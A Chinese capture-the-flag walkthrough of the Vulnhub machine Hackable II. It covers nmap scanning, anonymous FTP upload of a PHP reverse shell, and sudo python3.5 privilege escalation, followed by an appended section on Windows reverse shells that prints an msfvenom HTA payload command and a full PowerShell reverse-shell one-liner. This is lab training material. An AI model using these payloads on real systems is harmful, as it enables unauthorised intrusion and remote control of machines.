靶机练习 No.24 Vulnhub靶机hackable-ii ftp匿名访问+上传马+网页运行 反弹shell sudo python3.5提权

靶机练习 No.24 Vulnhub靶机hackableII

0x00 环境安装

  • 下载地址

       https://www.vulnhub.com/entry/hackable-ii,711/
    
  • 名称: hacksudo系列HackDudo

  • 靶场: VulnHub.com

  • 难度: 简单

  • 发布时间: 2021年3月16日

  • 提示信息: 无

  • 目标: 2个flag

  • 环境搭建
    Virtual Box 启动 网卡 配置与kali 同网卡

0x01 信息收集

步骤一:ip探测

nmap -sP 192.168.56.0/24

在这里插入图片描述
192.168.56.115 锁定为

步骤二:端口服务识别

nmap -sC -sV -A -p- 192.168.56.115 -o port.txt

在这里插入图片描述
从nmap 扫描结果看出
21 ftp 可以匿名访问
22 ssh
80 http apache 2.4.18

0x02 漏洞挖掘

思路一:ftp 匿名访问

思路二:80 http服务挖掘

手工+扫描器+目录+源码+功能点

思路三:ssh爆破

测试中收集到的密码 用于爆破

步骤一:ftp匿名访问(成功)

(1) 匿名登录

 ftp 192.168.56.115
 anonymous
 回车
 回车
 ls
 get CALL.html

只有一个CALL.html文件 下载下来看看
在这里插入图片描述

(2)查看内容

在这里插入图片描述
一个html页面内容 先放过

步骤二:80http探测

(1)访问首页

apache 配置页面
在这里插入图片描述

(2)查看源码 有没有隐藏信息

发现提示目录扫描
在这里插入图片描述

(3)目录扫描

python3 dirsearch.py  -u "http://192.168.56.115" -e "*"

在这里插入图片描述

(4)查看files页面

又发现 CALL.html页面
在这里插入图片描述
说明此处为 ftp登录后 的地方
回头看看ftp 是否可以写入文件 可以的话 可以上传马 getshell

步骤三:ftp上传马

(1)查看ftp是否拥有写权限

在这里插入图片描述

(2)上传 kali自带的php反弹shell的马

cd /usr/share/webshells/php/
vim /usr/share/webshells/php/php-reverse-shell.php

修改ip 为靶机可以访问到的 kali ip
在这里插入图片描述
在这里插入图片描述

(3)kali开启监听,并运行马 在这里插入图片描述

网页访问文件
在这里插入图片描述

(4)反弹shell(成功)

只有www-data权限
在这里插入图片描述

步骤四:切换为完整终端(成功)

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+Z
stty -a
stty raw -echo;fg
reset

在这里插入图片描述

步骤五:www-data 权限信息收集

(1)cat /etc/passwd

在这里插入图片描述

(2)/home目录下信息收集

/home 目录下存在 important.txt文件 有 读权限
读取 提示 运行 /.runme.sh 脚本
运行后
显示 密钥被破坏了
重启电脑在3秒后
重启电脑在2秒后
重启电脑在1秒后
在这里插入图片描述
密钥解密 得
onion
在这里插入图片描述

(3)/home/shrek 目录下信息收集

大多没有读权限
在这里插入图片描述

步骤六:ssh登录shrek用户(登录成功)

(1)尝试用收集到的密码登录shrek用户(成功)

在这里插入图片描述

(2)查看user.txt

在这里插入图片描述

0x03 提权

3.1 sudo 查看

(1)sudo -l

在这里插入图片描述
(root)NOPASSWD: /usr/bin/python3.5
发现 python3.5

(2)python3.5 提权(成功)

sudo python3.5 -c 'import os;os.system("/bin/sh")'

在这里插入图片描述

(3)查看root.txt

在这里插入图片描述

0x04 总结

(1)nmap 扫出 ftp匿名访问 anonymous登录成功存在读写权限

(2)目录扫描扫出files目录 发现也是ftp登陆后的目录。

(3)ftp 上传kali的php 反弹shell马,网页运行。

(4)反弹shell成功后,收集到一处MD5解密,解密出onion。

(5)ssh登录shrek用户成功。

(6)sudo -l 发现 不用密码就可以以root权限执行 python3.5

(7)sudo python3.5 -c 'import os;os.system("/bin/sh")'切换root终端成功.

### Windows 靶机反弹 Shell方法 #### 一、使用 Metasploit 实现反弹 Shell 为了创建一个可以用于反弹 Shell 的 payload 文件,可以通过 `msfvenom` 工具来完成。对于 Windows 系统而言,假设目标机器支持 x64 架构,则可采用如下命令生成 HTA 格式的 Payload: ```bash msfvenom -p windows/x64/shell_reverse_tcp LHOST=<vps_ip> LPORT=9090 -f hta-psh -o 1.hta ``` 此操作将会把生成的恶意文件保存为名为 "1.hta" 的文件[^3]。 当受害者访问这个 .hta 文件时,它会在受害者的计算机上执行并尝试连接到指定 IP 地址和端口上的监听器,从而建立反向 Shell 连接。 #### 二、通过 Netcat (nc) 创建简单 TCP 反弹 Shell 另一种较为基础的方式是在攻击者控制下的设备上启动监听服务,并让目标主机发送回连接请求。具体做法如下所示: - 攻击方设置好监听状态:`nc -lvp 4444` - 被控端执行相应指令以发起连接:`powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient(&#39;192.168.41.142&#39;,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2 = $sendback + &#39;PS &#39; + (pwd).Path + &#39;> &#39;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"` 上述 PowerShell 命令能够供更稳定的交互环境给攻击者[^2]。 #### 三、关于过程中的注意事项 一旦获得了初始级别的 Shell 访问限之后,下一步通常是试图升至更高层次的操作系统特级别。然而,在实际操作中需要注意以下几个方面的问题: - **网络配置**:确认攻击机与靶机处于相同网段内; - **架构匹配度**:确保所使用的 exploit 或 payload 符合目标系统的 CPU 类型(即 32-bit vs 64-bit),这可通过运行 `systeminfo` 来获取信息; - **持续性维护会话**:在整个渗透测试期间维持稳定的目标系统在线状况; - **漏洞适用范围**:考虑到某些安全更新可能已经修复了特定类型的弱点,因此应当针对未修补版本实施攻击策略; 最后一步是验证是否成功升了限等级,通常情况下可以借助于调用 `whoami` 或类似的内置工具来进行检查。如果显示的结果表明当前是以管理员身份登录的话,则说明操作顺利完成[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值